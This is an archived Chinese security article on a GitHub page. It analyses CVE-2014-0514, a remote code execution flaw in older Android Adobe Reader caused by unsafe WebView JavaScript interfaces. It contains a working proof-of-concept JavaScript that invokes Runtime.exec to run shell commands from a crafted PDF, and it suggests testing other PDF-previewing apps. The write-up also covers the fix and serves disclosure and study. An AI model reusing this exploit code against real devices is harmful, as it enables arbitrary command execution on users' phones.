forked from Trietptm-on-Security/WooYun-2
-
Notifications
You must be signed in to change notification settings - Fork 7
/
Android Adobe Reader 任意代码执行分析(附POC).html
111 lines (73 loc) · 115 KB
/
Android Adobe Reader 任意代码执行分析(附POC).html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
<html>
<head>
<title>Android Adobe Reader 任意代码执行分析(附POC) - livers</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<body>
<h1>原文地址:<a href="http://drops.wooyun.org/papers/1440">http://drops.wooyun.org/papers/1440</a></h1>
<p>
<h2>0x00 描述</h2>
<hr />
<p>前几天老外在fd还有exploit-db上,公布了Adobe Reader任意代码执行的漏洞。</p>
<p>漏洞编号: <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0514">CVE: 2014-0514</a></p>
<p>AdobeReader安装量比较大,又和浏览器容器不同,分析一下。</p>
<p>Android Adobe Reader 调用webview的不安全的Javascript interfaces。</p>
<p>导致可以执行任意js代码。具体查看<a href="http://drops.wooyun.org/papers/548">WebView中接口隐患与手机挂马利用</a>。</p>
<!--more-->
<p>影响版本:</p>
<p>理论上Android Adobe Reader 11.2.0之前的版本多存在,Android version 11.1.3成功利用。</p>
<p>我查看了之前的几个版本例如Android Adobe Reader 11.1.2 如下图,问题也应该存在。</p>
<p><img src="http://static.wooyun.org/20140918/2014091813332241483.png" alt="enter image description here" /></p>
<h2>0x01利用</h2>
<hr />
<p>从反编译出来的java代码看</p>
<pre><code>#!java
public class ARJavaScript
{
[...]
public ARJavaScript(ARViewerActivity paramARViewerActivity)
{
[...]
this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this), "_adobereader");
this.mWebView.addJavascriptInterface(new ARJavaScriptApp(this.mContext), "_app");
this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc");
this.mWebView.addJavascriptInterface(new ARJavaScriptEScriptString(this.mContext), "_escriptString");
this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), "_event");
this.mWebView.addJavascriptInterface(new ARJavaScriptField(), "_field");
this.mWebView.setWebViewClient(new ARJavaScript.1(this));
this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
}
</code></pre>
<p><code>_adobereader,_app,_doc,_escriptString,_event,_field</code>这几个变量都会存在任意代码执行的问题.</p>
<p>利用代码和之前一样。</p>
<pre><code>#!java
function execute(bridge, cmd) {
return bridge.getClass().forName('java.lang.Runtime')
.getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
if(window._app) {
try {
var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
execute(window._app, ['/system/bin/sh','-c','echo \"Lorem ipsum\" > ' + path]);
window._app.alert(path + ' created', 3);
} catch(e) {
window._app.alert(e, 0);
}
}
</code></pre>
<p>这里不同是构造 恶意的PDF。</p>
<p>首先需要一个PDF编辑器,比如Adobe Acrobat(flash达人pz推荐).</p>
<p>然后添加表单按钮或者书签等,调用事件添加</p>
<p><img src="http://static.wooyun.org/20140918/2014091813332335341.jpeg" alt="enter image description here" /></p>
<p>我这里看了下button最好演示,和老外的那个poc一样基本上.</p>
<p>导入到android虚拟机里,打开,成功复现。</p>
<p><img src="http://static.wooyun.org/20140918/2014091813332386324.png" alt="enter image description here" /></p>
<h2>0x02 扩展</h2>
<hr />
<p>一些网盘或浏览器,看看能否调用adobe reader来预览pdf的应用可能会存在这个漏洞,大部分应用都是直接下载pdf到本地。可以再测试一些能预览pdf的邮箱之类的应用。</p>
<h2>0x03 修复</h2>
<hr />
<p>新版本的Adobe Reader 11.2.0 <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="1efaa6a42a302cfaa5bbfaa694f9849af98ab6f896a9faa3a1f98ab6faa498fbb097fb9bb6f9849a746df6ae9df98ab6f890bbfb91bddcbe5e547f687f6d7d6c776e">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>tInterface,老版本的用户则在adobereader禁用了表单的js执行。 不知道那些杀毒软件能不能检测到这些恶意poc呢 :)</p>
<p>附上<a href="http://static.wooyun.org/20141017/2014101711445669638.pdf">poc.pdf</a></p> </p>
</body>
</html>